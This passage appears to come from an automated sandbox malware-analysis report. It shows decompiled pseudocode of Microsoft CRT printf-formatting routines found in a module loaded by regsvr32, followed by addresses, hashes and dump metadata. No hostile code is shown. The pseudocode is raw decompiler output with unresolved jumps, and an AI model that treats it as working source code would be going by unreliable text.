                                                  				signed int _t333;
                                                  				signed long long _t336;
                                                  				intOrPtr* _t359;
                                                  				signed long long _t384;
                                                  
                                                  				_t332 = __rax;
                                                  				_a116 = 0x10;
                                                  				asm("bts eax, 0xf");
                                                  				_a708 = 7;
                                                  				_a708 = 0x27;
                                                  				_a72 = 0x10;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                  				_a84 = 0x30;
                                                  				_a85 = _a708 + 0x51;
                                                  				_a92 = 2;
                                                  				_a72 = 8;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                  				asm("bts eax, 0x9");
                                                  				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                  				E000007FE7FEF9D31EA0( &_a1112);
                                                  				_a824 = _t332;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                  				E000007FE7FEF9D31EA0( &_a1112);
                                                  				_a824 = _t332;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                  				_t333 = E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t333;
                                                  				goto 0xf9d3c80e;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t333;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t333;
                                                  				goto 0xf9d3c84b;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t333;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                  				if (_a824 >= 0) goto 0xf9d3c882;
                                                  				_a832 =  ~_a824;
                                                  				asm("bts eax, 0x8");
                                                  				goto 0xf9d3c892;
                                                  				_t336 = _a824;
                                                  				_a832 = _t336;
                                                  				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                  				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                  				_a832 = _a832 & _t336;
                                                  				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                  				_a116 = 1;
                                                  				goto 0xf9d3c8f5;
                                                  				_a80 = _a80 & 0xfffffff7;
                                                  				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                  				_a116 = 0x200;
                                                  				if (_a832 != 0) goto 0xf9d3c908;
                                                  				_a92 = 0;
                                                  				_a64 =  &_a687;
                                                  				_t217 = _a116;
                                                  				_a116 = _a116 - 1;
                                                  				if (_t217 > 0) goto 0xf9d3c936;
                                                  				if (_a832 == 0) goto 0xf9d3c9d3;
                                                  				_a1040 = _a72;
                                                  				_a816 = _t217 / _a1040 + 0x30;
                                                  				_a1048 = _a72;
                                                  				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                  				_t222 = _a816 + _a708;
                                                  				_a816 = _t222;
                                                  				 *_a64 = _a816 & 0x000000ff;
                                                  				_a64 = _a64 - 1;
                                                  				goto 0xf9d3c915;
                                                  				_a104 = _t222;
                                                  				_a64 = _a64 + 1;
                                                  				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                  				if (_a104 == 0) goto 0xf9d3ca12;
                                                  				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                  				_a64 = _a64 - 1;
                                                  				 *_a64 = 0x30;
                                                  				_a104 = _a104 + 1;
                                                  				if (_a108 != 0) goto 0xf9d3cc6e;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                  				_a84 = 0x2d;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                  				_a84 = 0x2b;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                  				_a84 = 0x20;
                                                  				_a92 = 1;
                                                  				_a840 = _a88 - _a104 - _a92;
                                                  				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                  				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                  				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                  				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                  				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                  				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                  				if (_a76 == 0) goto 0xf9d3cc1d;
                                                  				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                  				_a872 = 0;
                                                  				_a848 = _a64;
                                                  				_a856 = _a104;
                                                  				_a856 = _a856 - 1;
                                                  				if (_a856 == 0) goto 0xf9d3cc1b;
                                                  				_a1056 =  *_a848 & 0x0000ffff;
                                                  				r9d = _a1056 & 0x0000ffff;
                                                  				r8d = 6;
                                                  				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                  				_a848 =  &(_a848[1]);
                                                  				if (_a872 != 0) goto 0xf9d3cbe5;
                                                  				if (_a860 != 0) goto 0xf9d3cbf2;
                                                  				_a688 = 0xffffffff;
                                                  				goto 0xf9d3cc1b;
                                                  				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                  				goto 0xf9d3cb60;
                                                  				goto 0xf9d3cc3b;
                                                  				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                  				if (_a688 < 0) goto 0xf9d3cc6e;
                                                  				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                  				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                  				if (_a96 == 0) goto 0xf9d3cc8e;
                                                  				0xf9d25330();
                                                  				_a96 = 0;
                                                  				goto 0xf9d3b99c;
                                                  				if (_a704 == 0) goto 0xf9d3ccb4;
                                                  				if (_a704 == 7) goto 0xf9d3ccb4;
                                                  				_a1060 = 0;
                                                  				goto 0xf9d3ccbf;
                                                  				_a1060 = 1;
                                                  				_t257 = _a1060;
                                                  				_a876 = _t257;
                                                  				if (_a876 != 0) goto 0xf9d3cd05;
                                                  				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                  				_a32 = _t359;
                                                  				r9d = 0;
                                                  				r8d = 0x8f5;
                                                  				0xf9d2b3b0();
                                                  				if (_t257 != 1) goto 0xf9d3cd05;
                                                  				asm("int3");
                                                  				if (_a876 != 0) goto 0xf9d3cd61;
                                                  				0xf9d2ab30();
                                                  				 *_t359 = 0x16;
                                                  				_a32 = 0;
                                                  				r9d = 0x8f5;
                                                  				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  				_a912 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				goto 0xf9d3cd80;
                                                  				_a916 = _a688;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  			}











                                                  0x7fef9d3c6f8
                                                  0x7fef9d3c6f8
                                                  0x7fef9d3c704
                                                  0x7fef9d3c70c
                                                  0x7fef9d3c719
                                                  0x7fef9d3c724
                                                  0x7fef9d3c737
                                                  0x7fef9d3c739
                                                  0x7fef9d3c748
                                                  0x7fef9d3c74c
                                                  0x7fef9d3c756
                                                  0x7fef9d3c769
                                                  0x7fef9d3c76f
                                                  0x7fef9d3c782
                                                  0x7fef9d3c78c
                                                  0x7fef9d3c791
                                                  0x7fef9d3c799
                                                  0x7fef9d3c7a9
                                                  0x7fef9d3c7b3
                                                  0x7fef9d3c7b8
                                                  0x7fef9d3c7c0
                                                  0x7fef9d3c7ce
                                                  0x7fef9d3c7d9
                                                  0x7fef9d3c7e8
                                                  0x7fef9d3c7ec
                                                  0x7fef9d3c7f4
                                                  0x7fef9d3c7fe
                                                  0x7fef9d3c806
                                                  0x7fef9d3c80e
                                                  0x7fef9d3c819
                                                  0x7fef9d3c823
                                                  0x7fef9d3c82a
                                                  0x7fef9d3c832
                                                  0x7fef9d3c83c
                                                  0x7fef9d3c843
                                                  0x7fef9d3c854
                                                  0x7fef9d3c85f
                                                  0x7fef9d3c86c
                                                  0x7fef9d3c878
                                                  0x7fef9d3c880
                                                  0x7fef9d3c882
                                                  0x7fef9d3c88a
                                                  0x7fef9d3c89d
                                                  0x7fef9d3c8aa
                                                  0x7fef9d3c8bf
                                                  0x7fef9d3c8cc
                                                  0x7fef9d3c8ce
                                                  0x7fef9d3c8d6
                                                  0x7fef9d3c8df
                                                  0x7fef9d3c8eb
                                                  0x7fef9d3c8ed
                                                  0x7fef9d3c8fe
                                                  0x7fef9d3c900
                                                  0x7fef9d3c910
                                                  0x7fef9d3c915
                                                  0x7fef9d3c91f
                                                  0x7fef9d3c925
                                                  0x7fef9d3c930
                                                  0x7fef9d3c93b
                                                  0x7fef9d3c95e
                                                  0x7fef9d3c96a
                                                  0x7fef9d3c997
                                                  0x7fef9d3c9a9
                                                  0x7fef9d3c9ab
                                                  0x7fef9d3c9bf
                                                  0x7fef9d3c9c9
                                                  0x7fef9d3c9ce
                                                  0x7fef9d3c9e0
                                                  0x7fef9d3c9ec
                                                  0x7fef9d3c9fc
                                                  0x7fef9d3ca03
                                                  0x7fef9d3ca10
                                                  0x7fef9d3ca1a
                                                  0x7fef9d3ca24
                                                  0x7fef9d3ca2d
                                                  0x7fef9d3ca36
                                                  0x7fef9d3ca45
                                                  0x7fef9d3ca52
                                                  0x7fef9d3ca54
                                                  0x7fef9d3ca59
                                                  0x7fef9d3ca61
                                                  0x7fef9d3ca6c
                                                  0x7fef9d3ca6e
                                                  0x7fef9d3ca73
                                                  0x7fef9d3ca7b
                                                  0x7fef9d3ca86
                                                  0x7fef9d3ca88
                                                  0x7fef9d3ca8d
                                                  0x7fef9d3caa5
                                                  0x7fef9d3cab5
                                                  0x7fef9d3cad0
                                                  0x7fef9d3caee
                                                  0x7fef9d3cafc
                                                  0x7fef9d3cb07
                                                  0x7fef9d3cb22
                                                  0x7fef9d3cb2c
                                                  0x7fef9d3cb37
                                                  0x7fef9d3cb3d
                                                  0x7fef9d3cb4d
                                                  0x7fef9d3cb59
                                                  0x7fef9d3cb70
                                                  0x7fef9d3cb79
                                                  0x7fef9d3cb8a
                                                  0x7fef9d3cb92
                                                  0x7fef9d3cb9b
                                                  0x7fef9d3cbb6
                                                  0x7fef9d3cbc9
                                                  0x7fef9d3cbd9
                                                  0x7fef9d3cbe3
                                                  0x7fef9d3cbe5
                                                  0x7fef9d3cbf0
                                                  0x7fef9d3cc11
                                                  0x7fef9d3cc16
                                                  0x7fef9d3cc1b
                                                  0x7fef9d3cc36
                                                  0x7fef9d3cc43
                                                  0x7fef9d3cc4e
                                                  0x7fef9d3cc69
                                                  0x7fef9d3cc74
                                                  0x7fef9d3cc80
                                                  0x7fef9d3cc85
                                                  0x7fef9d3cc8e
                                                  0x7fef9d3cc9b
                                                  0x7fef9d3cca5
                                                  0x7fef9d3cca7
                                                  0x7fef9d3ccb2
                                                  0x7fef9d3ccb4
                                                  0x7fef9d3ccbf
                                                  0x7fef9d3ccc6
                                                  0x7fef9d3ccd5
                                                  0x7fef9d3ccd7
                                                  0x7fef9d3ccde
                                                  0x7fef9d3cce3
                                                  0x7fef9d3cce6
                                                  0x7fef9d3ccf8
                                                  0x7fef9d3cd00
                                                  0x7fef9d3cd02
                                                  0x7fef9d3cd0d
                                                  0x7fef9d3cd0f
                                                  0x7fef9d3cd14
                                                  0x7fef9d3cd1a
                                                  0x7fef9d3cd23
                                                  0x7fef9d3cd3e
                                                  0x7fef9d3cd43
                                                  0x7fef9d3cd53
                                                  0x7fef9d3cd5f
                                                  0x7fef9d3cd68
                                                  0x7fef9d3cd74
                                                  0x7fef9d3cd97

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg
                                                  • String ID: 0$9
                                                  • API String ID: 1967237116-1975997740
                                                  • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                  • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                                  • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                  • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 23%
                                                  			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                  				signed int _t213;
                                                  				signed char _t218;
                                                  				void* _t249;
                                                  				intOrPtr _t257;
                                                  				signed int _t331;
                                                  				signed int _t332;
                                                  				signed long long _t335;
                                                  				intOrPtr* _t354;
                                                  				intOrPtr* _t359;
                                                  				signed long long _t389;
                                                  
                                                  				_t331 = __rax;
                                                  				_a1220 = 0x27;
                                                  				_a72 = 0x10;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                  				_a84 = 0x30;
                                                  				_a86 = _a1220 + 0x51;
                                                  				_a92 = 2;
                                                  				_a72 = 8;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                  				asm("bts eax, 0x9");
                                                  				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                  				E000007FE7FEF9D31EA0( &_a1560);
                                                  				_a1304 = _t331;
                                                  				goto 0xf9d3e844;
                                                  				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                  				E000007FE7FEF9D31EA0( &_a1560);
                                                  				_a1304 = _t331;
                                                  				goto 0xf9d3e844;
                                                  				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                  				_t332 = E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t332;
                                                  				goto 0xf9d3e807;
                                                  				E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t332;
                                                  				goto 0xf9d3e844;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                  				E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t332;
                                                  				goto 0xf9d3e844;
                                                  				E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t332;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                  				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                  				_a1312 =  ~_a1304;
                                                  				asm("bts eax, 0x8");
                                                  				goto 0xf9d3e88b;
                                                  				_t335 = _a1304;
                                                  				_a1312 = _t335;
                                                  				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                  				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                  				_a1312 = _a1312 & _t335;
                                                  				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                  				_a116 = 1;
                                                  				goto 0xf9d3e8ee;
                                                  				_a80 = _a80 & 0xfffffff7;
                                                  				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                  				_a116 = 0x200;
                                                  				if (_a1312 != 0) goto 0xf9d3e901;
                                                  				_a92 = 0;
                                                  				_a64 =  &_a687;
                                                  				_t213 = _a116;
                                                  				_a116 = _a116 - 1;
                                                  				if (_t213 > 0) goto 0xf9d3e92f;
                                                  				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                  				_a1480 = _a72;
                                                  				_a1296 = _t213 / _a1480 + 0x30;
                                                  				_a1488 = _a72;
                                                  				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                  				_t218 = _a1296 + _a1220;
                                                  				_a1296 = _t218;
                                                  				 *_a64 = _a1296 & 0x000000ff;
                                                  				_a64 = _a64 - 1;
                                                  				goto 0xf9d3e90e;
                                                  				_a104 = _t218;
                                                  				_a64 = _a64 + 1;
                                                  				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                  				if (_a104 == 0) goto 0xf9d3ea0b;
                                                  				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                  				_a64 = _a64 - 1;
                                                  				 *_a64 = 0x30;
                                                  				_a104 = _a104 + 1;
                                                  				if (_a108 != 0) goto 0xf9d3ec7c;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                  				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                  				_a84 = 0x2d;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ea9d;
                                                  				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                  				_a84 = 0x2b;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ea9d;
                                                  				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                  				_a84 = 0x20;
                                                  				_a92 = 1;
                                                  				_a1320 = _a88 - _a104 - _a92;
                                                  				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                  				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                  				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                  				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                  				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                  				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                  				if (_a76 != 0) goto 0xf9d3ec29;
                                                  				if (_a104 <= 0) goto 0xf9d3ec29;
                                                  				_t354 = _a64;
                                                  				_a1328 = _t354;
                                                  				_a1336 = _a104;
                                                  				_a1336 = _a1336 - 1;
                                                  				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                  				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                  				_a1496 = _t354;
                                                  				E000007FE7FEF9D26840(_t249,  &_a120);
                                                  				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                                  				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                  				_a1200 = 0xffffffff;
                                                  				goto 0xf9d3ec27;
                                                  				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                  				_a1328 = _a1328 + _a1340;
                                                  				goto 0xf9d3eb61;
                                                  				goto 0xf9d3ec47;
                                                  				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                  				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                  				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                  				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                  				if (_a96 == 0) goto 0xf9d3ec9c;
                                                  				0xf9d25330();
                                                  				_a96 = 0;
                                                  				goto 0xf9d3da75;
                                                  				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                  				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                  				_a1504 = 0;
                                                  				goto 0xf9d3eccd;
                                                  				_a1504 = 1;
                                                  				_t257 = _a1504;
                                                  				_a1344 = _t257;
                                                  				if (_a1344 != 0) goto 0xf9d3ed13;
                                                  				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                  				_a32 = _t359;
                                                  				r9d = 0;
                                                  				r8d = 0x8f5;
                                                  				0xf9d2b3b0();
                                                  				if (_t257 != 1) goto 0xf9d3ed13;
                                                  				asm("int3");
                                                  				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                  				0xf9d2ab30();
                                                  				 *_t359 = 0x16;
                                                  				_a32 = 0;
                                                  				r9d = 0x8f5;
                                                  				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  				_a1376 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				goto 0xf9d3ed8e;
                                                  				_a1380 = _a1200;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  			}













                                                  0x7fef9d3e70c
                                                  0x7fef9d3e70c
                                                  0x7fef9d3e717
                                                  0x7fef9d3e72a
                                                  0x7fef9d3e731
                                                  0x7fef9d3e740
                                                  0x7fef9d3e745
                                                  0x7fef9d3e74f
                                                  0x7fef9d3e762
                                                  0x7fef9d3e768
                                                  0x7fef9d3e77b
                                                  0x7fef9d3e785
                                                  0x7fef9d3e78a
                                                  0x7fef9d3e792
                                                  0x7fef9d3e7a2
                                                  0x7fef9d3e7ac
                                                  0x7fef9d3e7b1
                                                  0x7fef9d3e7b9
                                                  0x7fef9d3e7c7
                                                  0x7fef9d3e7d2
                                                  0x7fef9d3e7e1
                                                  0x7fef9d3e7e5
                                                  0x7fef9d3e7ed
                                                  0x7fef9d3e7f7
                                                  0x7fef9d3e7ff
                                                  0x7fef9d3e807
                                                  0x7fef9d3e812
                                                  0x7fef9d3e81c
                                                  0x7fef9d3e823
                                                  0x7fef9d3e82b
                                                  0x7fef9d3e835
                                                  0x7fef9d3e83c
                                                  0x7fef9d3e84d
                                                  0x7fef9d3e858
                                                  0x7fef9d3e865
                                                  0x7fef9d3e871
                                                  0x7fef9d3e879
                                                  0x7fef9d3e87b
                                                  0x7fef9d3e883
                                                  0x7fef9d3e896
                                                  0x7fef9d3e8a3
                                                  0x7fef9d3e8b8
                                                  0x7fef9d3e8c5
                                                  0x7fef9d3e8c7
                                                  0x7fef9d3e8cf
                                                  0x7fef9d3e8d8
                                                  0x7fef9d3e8e4
                                                  0x7fef9d3e8e6
                                                  0x7fef9d3e8f7
                                                  0x7fef9d3e8f9
                                                  0x7fef9d3e909
                                                  0x7fef9d3e90e
                                                  0x7fef9d3e918
                                                  0x7fef9d3e91e
                                                  0x7fef9d3e929
                                                  0x7fef9d3e934
                                                  0x7fef9d3e957
                                                  0x7fef9d3e963
                                                  0x7fef9d3e990
                                                  0x7fef9d3e9a2
                                                  0x7fef9d3e9a4
                                                  0x7fef9d3e9b8
                                                  0x7fef9d3e9c2
                                                  0x7fef9d3e9c7
                                                  0x7fef9d3e9d9
                                                  0x7fef9d3e9e5
                                                  0x7fef9d3e9f5
                                                  0x7fef9d3e9fc
                                                  0x7fef9d3ea09
                                                  0x7fef9d3ea13
                                                  0x7fef9d3ea1d
                                                  0x7fef9d3ea26
                                                  0x7fef9d3ea2f
                                                  0x7fef9d3ea3e
                                                  0x7fef9d3ea4b
                                                  0x7fef9d3ea52
                                                  0x7fef9d3ea57
                                                  0x7fef9d3ea5f
                                                  0x7fef9d3ea6a
                                                  0x7fef9d3ea71
                                                  0x7fef9d3ea76
                                                  0x7fef9d3ea7e
                                                  0x7fef9d3ea89
                                                  0x7fef9d3ea90
                                                  0x7fef9d3ea95
                                                  0x7fef9d3eaad
                                                  0x7fef9d3eabd
                                                  0x7fef9d3eada
                                                  0x7fef9d3eaf8
                                                  0x7fef9d3eb06
                                                  0x7fef9d3eb11
                                                  0x7fef9d3eb2e
                                                  0x7fef9d3eb38
                                                  0x7fef9d3eb43
                                                  0x7fef9d3eb49
                                                  0x7fef9d3eb4e
                                                  0x7fef9d3eb5a
                                                  0x7fef9d3eb71
                                                  0x7fef9d3eb7a
                                                  0x7fef9d3eb85
                                                  0x7fef9d3eb8a
                                                  0x7fef9d3eb97
                                                  0x7fef9d3ebc9
                                                  0x7fef9d3ebd8
                                                  0x7fef9d3ebda
                                                  0x7fef9d3ebe5
                                                  0x7fef9d3ebff
                                                  0x7fef9d3ec1a
                                                  0x7fef9d3ec22
                                                  0x7fef9d3ec27
                                                  0x7fef9d3ec42
                                                  0x7fef9d3ec4f
                                                  0x7fef9d3ec5a
                                                  0x7fef9d3ec77
                                                  0x7fef9d3ec82
                                                  0x7fef9d3ec8e
                                                  0x7fef9d3ec93
                                                  0x7fef9d3ec9c
                                                  0x7fef9d3eca9
                                                  0x7fef9d3ecb3
                                                  0x7fef9d3ecb5
                                                  0x7fef9d3ecc0
                                                  0x7fef9d3ecc2
                                                  0x7fef9d3eccd
                                                  0x7fef9d3ecd4
                                                  0x7fef9d3ece3
                                                  0x7fef9d3ece5
                                                  0x7fef9d3ecec
                                                  0x7fef9d3ecf1
                                                  0x7fef9d3ecf4
                                                  0x7fef9d3ed06
                                                  0x7fef9d3ed0e
                                                  0x7fef9d3ed10
                                                  0x7fef9d3ed1b
                                                  0x7fef9d3ed1d
                                                  0x7fef9d3ed22
                                                  0x7fef9d3ed28
                                                  0x7fef9d3ed31
                                                  0x7fef9d3ed4c
                                                  0x7fef9d3ed51
                                                  0x7fef9d3ed61
                                                  0x7fef9d3ed6d
                                                  0x7fef9d3ed76
                                                  0x7fef9d3ed82
                                                  0x7fef9d3eda5

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg
                                                  • String ID: '$9
                                                  • API String ID: 1967237116-1823400153
                                                  • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                  • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                                  • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                  • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _unlock
                                                  • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                  • API String ID: 2480363372-1749241151
                                                  • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                  • Instruction ID: 04ee9255729ef7e149dbf43242f730f4bbed3ff16cc2c5ac2558ad9c7efde415
                                                  • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
